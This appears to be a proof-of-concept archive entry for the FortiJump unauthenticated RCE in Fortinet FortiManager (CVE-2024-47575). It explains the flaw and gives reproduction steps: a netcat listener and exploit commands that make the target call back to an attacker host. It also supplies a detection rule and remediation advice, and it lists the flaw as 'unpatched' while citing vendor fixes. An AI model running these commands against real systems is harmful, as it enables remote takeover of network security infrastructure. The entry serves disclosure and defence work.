Fortinet FortiManager FortiJump Unauthenticated RCE (CVE-2024-47575)
by watchTowr Labs (Sina Kheirkhah) · 2026-05-17
- Severity
- Critical
- CVE
- CVE-2024-47575
- Category
- network
- Affected product
- Fortinet FortiManager / FortiManager Cloud (fgfmd daemon)
- Affected versions
- FortiManager 7.6.0; 7.4.0–7.4.4; 7.2.0–7.2.7; 7.0.0–7.0.12; 6.4.0–6.4.14; 6.2.0–6.2.12; FortiManager Cloud 7.4.1–7.4.4, 7.2.1–7.2.7, 7.0.1–7.0.12, 6.4
- Disclosed
- 2026-05-17
- Patch status
- unpatched
References
- https://nvd.nist.gov/vuln/detail/CVE-2024-47575
- https://www.fortiguard.com/psirt/FG-IR-24-423
- https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Author / Researcher | watchTowr Labs (Sina Kheirkhah) |
| CVE / Advisory | CVE-2024-47575 |
| Category | network |
| Severity | Critical |
| CVSS Score | 9.8 (CVSSv3) |
| Status | Weaponized |
| Tags | RCE, unauthenticated, FortiManager, fgfmd, zero-day, KEV |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Fortinet FortiManager / FortiManager Cloud (fgfmd daemon) |
| Versions Affected | FortiManager 7.6.0; 7.4.0–7.4.4; 7.2.0–7.2.7; 7.0.0–7.0.12; 6.4.0–6.4.14; 6.2.0–6.2.12; FortiManager Cloud 7.4.1–7.4.4, 7.2.1–7.2.7, 7.0.1–7.0.12, 6.4 |
| Language / Platform | Network-exposed FortiManager management plane over TLS (port 541 / fgfmd protocol) |
| Authentication Required | No |
| Network Access Required | Yes |
Summary
CVE-2024-47575 (FortiJump) is a missing-authentication flaw in FortiManager’s fgfmd daemon that lets a remote unauthenticated attacker execute arbitrary commands. Public exploit code demonstrates vulnerability detection and command execution primitives over the management protocol. Reporting indicates this bug was exploited as a zero-day from at least June 2024 and is tracked in CISA’s Known Exploited Vulnerabilities catalog.
Vulnerability Details
Root Cause
The fgfmd daemon accepts crafted management messages without properly enforcing authentication and authorization on critical actions. An attacker can impersonate a managed FortiGate context, establish a file-exchange channel, and issue privileged JSON RPC-like commands that reach command execution paths.
Attack Vector
An unauthenticated attacker with network reachability to the FortiManager management service (commonly TCP/541 over TLS) sends a crafted sequence (get ip → get auth → get file_exchange) and then submits a malicious command payload through channel messages.
Impact
Successful exploitation enables unauthenticated remote code execution on FortiManager infrastructure. Real-world impact includes device compromise, malicious script execution, and downstream control-plane abuse against managed security infrastructure.
Environment / Lab Setup
OS: Linux/macOS attacker host with Python 3
Target: Authorized FortiManager/FortiManager Cloud instance in vulnerable range
Attacker: Security testing workstation
Tools: Python 3, network reachability to TCP/541, netcat listener
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
Start a listener on your authorized lab attacker host.
1nc -lvvnp 4444Run vulnerability check mode against the target.
1python3 CVE-2024-47575.py --target <fortimanager-ip> --action checkRun exploit mode to deliver the command payload.
1 2 3 4 5python3 CVE-2024-47575.py \ --target <fortimanager-ip> \ --lhost <attacker-ip> \ --lport 4444 \ --action exploit
Exploit Code
See
CVE-2024-47575.pyin this folder.
| |
Expected Output
[VULN] Target is Vulnerable
Screenshots / Evidence
screenshots/— add authorized packet captures, listener callback evidence, and target-side logs
Detection & Indicators of Compromise
SIEM / IDS Rule (example):
alert tcp any any -> $HOME_NET 541 (
msg:"Possible FortiManager CVE-2024-47575 exploitation sequence";
flow:to_server,established;
content:"get file_exchange";
sid:952447575; rev:1;
)
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Fortinet fixes from FG-IR-24-423 for FortiManager/FortiManager Cloud affected branches |
| Workaround | Restrict management-plane exposure to trusted admin networks and VPN-only access; block untrusted access to TCP/541 |
| Config Hardening | Monitor fgfmd traffic and logs for anomalous registration/channel operations; rotate credentials and audit managed devices after incident response |
References
- CVE-2024-47575 — NVD
- Fortinet PSIRT Advisory FG-IR-24-423
- watchTowr Labs Blog — Hop, Skip, FortiJump!
- CISA Known Exploited Vulnerabilities Catalog
- Source Repository — watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
Notes
Auto-ingested from https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575 on 2026-05-17.
| |